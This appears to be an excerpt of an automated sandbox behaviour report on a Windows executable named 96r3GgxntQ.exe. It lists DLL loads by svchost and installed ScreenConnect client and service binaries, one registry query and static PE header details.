                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 96r3GgxntQ.exeStatic PE information: certificate valid
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 96r3GgxntQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: 96r3GgxntQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
